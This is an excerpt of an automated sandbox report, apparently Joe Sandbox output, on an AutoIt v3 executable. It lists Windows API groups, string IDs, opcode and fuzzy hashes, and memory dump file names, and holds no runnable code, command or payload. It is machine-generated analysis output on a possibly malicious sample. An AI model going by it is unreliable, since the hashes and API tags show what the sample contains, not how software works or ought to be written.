                                                            Similarity
                                                            • API ID: _onexit
                                                            • String ID:
                                                            • API String ID: 572287377-0
                                                            • Opcode ID: 5447c473e94d7294484c99fc93f4d38cb7bf7a8a438e953c913b8a13f1fa59d2
                                                            • Instruction ID: a69e5b8239e24aeb7898af66ad5a795dc120ced15c77b5fde41e76aead13139d
                                                            • Opcode Fuzzy Hash: 5447c473e94d7294484c99fc93f4d38cb7bf7a8a438e953c913b8a13f1fa59d2
                                                            • Instruction Fuzzy Hash: FBC01201F6A0CB80ED0873BA6D860F841901FE5700FD80675D00E80692DF1C51E65631
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentVersionWow64_onexit
                                                            • String ID:
                                                            • API String ID: 2932345936-0
                                                            • Opcode ID: 03ad02108163b1b9c24d53c6048626981572e85475d5139af19f078af1ef234b
                                                            • Instruction ID: d02a068bca7b6d0d9347c7b388e76959fa55ddf9152bd7e1bc5de054cee5cb26
                                                            • Opcode Fuzzy Hash: 03ad02108163b1b9c24d53c6048626981572e85475d5139af19f078af1ef234b
                                                            • Instruction Fuzzy Hash: A9C01200F6A0CB80EE0873BA68860F442904FA5740FD80136D10EC0682DF0C51E64631
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast
                                                            • String ID:
                                                            • API String ID: 1452528299-0
                                                            • Opcode ID: b1ea28e244f60b4af54ff34aaaf102a183879d86c5d4002b95e89690f8712e5a
                                                            • Instruction ID: 31be292e3572dbea8eaff57a693d48b67a82d17dc18823403babfe2f3cbdd6f1
                                                            • Opcode Fuzzy Hash: b1ea28e244f60b4af54ff34aaaf102a183879d86c5d4002b95e89690f8712e5a
                                                            • Instruction Fuzzy Hash: AF715922B04A8286EF14FF65E0943FDA760EB84B94F884532DE1E577A6DF38D455C360
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: AllocHeap
                                                            • String ID:
                                                            • API String ID: 4292702814-0
                                                            • Opcode ID: d6cab95e1f74feff6e8dd6f9a30a9cf55c0df8872244003ab96fdfaeeafef6ec
                                                            • Instruction ID: 934ef86a3de005ee400a63462a17410f3bfa1d3a8359d326ea704e1b50021687
                                                            • Opcode Fuzzy Hash: d6cab95e1f74feff6e8dd6f9a30a9cf55c0df8872244003ab96fdfaeeafef6ec
                                                            • Instruction Fuzzy Hash: F2F0D441B0A2C685FE64B7A178512F9D2815F84FA0FCC4634D92E8A6C2DF6DE8818A30
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                            • API String ID: 2211948467-2373415609
                                                            • Opcode ID: 8e2f89096802004413711948fd726798781e069153c0ca8acc30819db0585273
                                                            • Instruction ID: e3288c479bad1aae05193e2a7c2a8fdd8cdc136f0ce1c8092c79fbbd1fb414b4
                                                            • Opcode Fuzzy Hash: 8e2f89096802004413711948fd726798781e069153c0ca8acc30819db0585273
                                                            • Instruction Fuzzy Hash: C422A376A0868186EB54EF25F8845ADB7B0FB88B94F984135DE4E83B64DF3CD445CB20
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$ClientScreen$LongStateWindow$CursorMenuPopupTrack$ParentProc
                                                            • String ID: @GUI_DRAGID$F
                                                            • API String ID: 1993697042-4164748364
                                                            • Opcode ID: 56f72f09bbed6945763f30ad9d633d39a2232c5a8ce1cdf1e6a0990a4f5aa755
                                                            • Instruction ID: 4464720692843d6c1f7b48a7a65a100fa53896093ff30e160c23bcfa2e683cab
                                                            • Opcode Fuzzy Hash: 56f72f09bbed6945763f30ad9d633d39a2232c5a8ce1cdf1e6a0990a4f5aa755
                                                            • Instruction Fuzzy Hash: 3F528272E08AC682EF14EB65E4946EDA760FB84B94F984135DB0D47BA4CF3CE452C720
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: DeleteDestroyIconImageLoadLongMessageObjectSendWindow
                                                            • String ID:
                                                            • API String ID: 3481653762-0
                                                            • Opcode ID: 0009db8de3ffea259ba8a46f35c7ba5ff9efa5b40b0df71df5247db5c8e89bc7
                                                            • Instruction ID: cfc547d0d622c257112ced1030519c8e33548549624e5968953c4b1e54da2add
                                                            • Opcode Fuzzy Hash: 0009db8de3ffea259ba8a46f35c7ba5ff9efa5b40b0df71df5247db5c8e89bc7
                                                            • Instruction Fuzzy Hash: 25326D76A096C187EB54EF25E4547A9BBA0FB84B84F984135DB4E43B98CF3CE446C720
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$LongMenuText$CharInfoItemNextwsprintf
                                                            • String ID: %d/%02d/%02d
                                                            • API String ID: 1218376639-328681919
                                                            • Opcode ID: 88d0c6dc924de39b2680e6b6a0383be569fd99a49510e92f6d82c1925c8df759
                                                            • Instruction ID: a9db0ce0db721033447563b394c68a185cd3198f9ae2ab1a973a900d04604546
                                                            • Opcode Fuzzy Hash: 88d0c6dc924de39b2680e6b6a0383be569fd99a49510e92f6d82c1925c8df759
                                                            • Instruction Fuzzy Hash: ED12E532A0968283FF14EB25A9947FDA7A0EB85B94F884135DB5947BD4CF3CD446C720
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageSend$Menu$Item$EnableInfoMove$DefaultShow$DrawFocusLongRect
                                                            • String ID: P
                                                            • API String ID: 1208186926-3110715001
                                                            • Opcode ID: 0e3e078a853430a05022e0f772db04c3cd8d70c986a797c2cebe1c7d1304ed73
                                                            • Instruction ID: 90e240b5084ab1d92b735d6389ba5447950b0739be9df938065459f2304dc33f
                                                            • Opcode Fuzzy Hash: 0e3e078a853430a05022e0f772db04c3cd8d70c986a797c2cebe1c7d1304ed73
                                                            • Instruction Fuzzy Hash: B212E472A086C287EB24AB25E4547FDBBA0FB85794F884539DB4A07B94CF3DE441C720
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                            • String ID: A$AutoIt v3$DISPLAY$msctls_progress32$static
                                                            • API String ID: 2910397461-2439800395
                                                            • Opcode ID: 6a4158767fd1e3aa62d6cad0ab6a36848a32ab8b88e438b2c1d2663541e17033
                                                            • Instruction ID: adc4d6775ea96ff5a43845f7eada3ea5e73f09719f96ca26c38f018985109b37
                                                            • Opcode Fuzzy Hash: 6a4158767fd1e3aa62d6cad0ab6a36848a32ab8b88e438b2c1d2663541e17033
                                                            • Instruction Fuzzy Hash: 5EE17176A0868187EB54EF25F8846ADBBA0F788B98F944135DB4E43B64CF7CE445CB10
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Destroy$ImageList_Window$DeleteMessageObjectSend$IconMove
                                                            • String ID:
                                                            • API String ID: 3372153169-0
                                                            • Opcode ID: cebe50662675a261df0ce57bb688d6874ca0698041b92cdd573b2dd792630721
                                                            • Instruction ID: 54a9d65dbb965b335db1f2528d047217dc3741ec86b3f290a85db5c9c9b68523
                                                            • Opcode Fuzzy Hash: cebe50662675a261df0ce57bb688d6874ca0698041b92cdd573b2dd792630721
                                                            • Instruction Fuzzy Hash: A122A162E086C782FF64AB15E5942FDA7A2EF80B98FD84131CA1E57694DF3CE441C321
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Process$StationWindow$CloseCurrentHandleUser$CreateDuplicate$BlockDesktopEnvironmentHeapOpenProfileToken$AdjustAllocDestroyErrorLastLoadLogonLookupPrivilegePrivilegesThreadUnloadValuewcscpy
                                                            • String ID: default$winsta0$winsta0\default
                                                            • API String ID: 3202303201-1423368268
                                                            • Opcode ID: de7527ded46d2e32930649954c580003a2a01d55c070abe543a614e541a7caf5
                                                            • Instruction ID: 0187a0c2cfb8fcf14c2e649d8fd5e738bb2f7dba97ba77a029c496ba7e5e7ca3
                                                            • Opcode Fuzzy Hash: de7527ded46d2e32930649954c580003a2a01d55c070abe543a614e541a7caf5
                                                            • Instruction Fuzzy Hash: 64A15132A09B8286EB10EF61F4446EAB7A1FB85794F880135DE9D47B99CF3CE005C760
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                            • String ID: AutoIt v3 GUI
                                                            • API String ID: 1458621304-248962490
                                                            • Opcode ID: b8f5b06e3d0277f3ffc73035af6cc9ad4e685f54e981a48a8f38e285d267cba3
                                                            • Instruction ID: 80de3b79d0e85ef42c357fed24b2216ef184bc67b37fd0ec6015d7fab015fe83
                                                            • Opcode Fuzzy Hash: b8f5b06e3d0277f3ffc73035af6cc9ad4e685f54e981a48a8f38e285d267cba3
                                                            • Instruction Fuzzy Hash: 46D16D72A046868BEB14EF78E8547EC77A1FB84B58F940135DA0E47AA8DF3CE445C760
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: memcpy_s$_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 2880407647-0
                                                            • Opcode ID: 58aa0ebf662a58accb0a9b8196807729812b5725d699f5f78ac16d2d228f8c2a
                                                            • Instruction ID: fd1252b3eb948a1e10040cce5780c225f736779436045edd978ad0dd625ad3e9
                                                            • Opcode Fuzzy Hash: 58aa0ebf662a58accb0a9b8196807729812b5725d699f5f78ac16d2d228f8c2a
                                                            • Instruction Fuzzy Hash: 8E03D772A092C28BDB759E25E440BFDB7A5F79478CF880135DA0E67B58DF38A940CB50
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                            • String ID:
                                                            • API String ID: 3222323430-0
                                                            • Opcode ID: 9b87d7956825108095e474127530b25728a3743fc17a6d5c8f31ecbd5b711407
                                                            • Instruction ID: 7a6da41c11cb0be30a301f60b734e35a8162fffd16a3b9da6a8a6cc5c8ebf9ae
                                                            • Opcode Fuzzy Hash: 9b87d7956825108095e474127530b25728a3743fc17a6d5c8f31ecbd5b711407
                                                            • Instruction Fuzzy Hash: C7713E25A09A8382EF54BB25E4942FCA761FF84B84FC94035DA4E477A5EF3CE5068770
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Menu$InfoItemTextWindow$CharDrawInvalidateNextRect
                                                            • String ID:
                                                            • API String ID: 1015379403-0
                                                            • Opcode ID: 811f6ddedc4938916125b3772b32f534d797e58df8d8128b9f335a51bc1c3411
                                                            • Instruction ID: d22a87f209d0b41effd14cc4f155574e8e17a5bf3e161c9696bd7a24358fe5df
                                                            • Opcode Fuzzy Hash: 811f6ddedc4938916125b3772b32f534d797e58df8d8128b9f335a51bc1c3411
                                                            • Instruction Fuzzy Hash: E602A261A096C286EF20BF25B8447F9ABA1FB84794F884239DB5D07AD4DF3CE545C720
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Cursor$Load$ErrorInfoLast
                                                            • String ID:
                                                            • API String ID: 3215588206-0
                                                            • Opcode ID: 486734a10a8987c1c87853d7cfea6df4eeb43b8f453fb3bc83844081bd685034
                                                            • Instruction ID: e0984b44e5d84802da6dcc9d0da0f1bc98b992faefa883d461a9f464d9476e04
                                                            • Opcode Fuzzy Hash: 486734a10a8987c1c87853d7cfea6df4eeb43b8f453fb3bc83844081bd685034
                                                            • Instruction Fuzzy Hash: 47517D32B0CB828AEB44EB64F5581BDB3A1EB48745F594439DA0F83B85DF7CE4168324
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfomemcpy_s$fegetenv
                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                            • API String ID: 281475176-2761157908
                                                            • Opcode ID: fcfcd3c85d5de11fcd116e00f6466421f1c918d309ac340d1a492b096d736d29
                                                            • Instruction ID: 7587073487912e18c82746a2f5ce7b7e4aa7c4711b8840c8d2d026be235bf19f
                                                            • Opcode Fuzzy Hash: fcfcd3c85d5de11fcd116e00f6466421f1c918d309ac340d1a492b096d736d29
                                                            • Instruction Fuzzy Hash: 40B22B72E081C28BFB25EE25E6506FDB7A1FB4438CF985135DA0957B85DF38E9048B11
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: CloseValue$ConnectCreateRegistry
                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                            • API String ID: 3314541760-966354055
                                                            • Opcode ID: 8da99fa8f9cfa95644d42f55175067c4e32022aa9dc53b987727f765eeff7340
                                                            • Instruction ID: 162ee6e6d99d960ed92281e3688b991c46cc68697f02698fdd3a9349d219fd35
                                                            • Opcode Fuzzy Hash: 8da99fa8f9cfa95644d42f55175067c4e32022aa9dc53b987727f765eeff7340
                                                            • Instruction Fuzzy Hash: F2024C76B08A8286EF10EF25E4902EDB7A0FB88F94B898035DE4D57756DF38E545C360
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: P
                                                            • API String ID: 0-3110715001
                                                            • Opcode ID: 89df1471032732431b81a05b11aefcbbc91b985f9c802d2c82d041fa720837f2
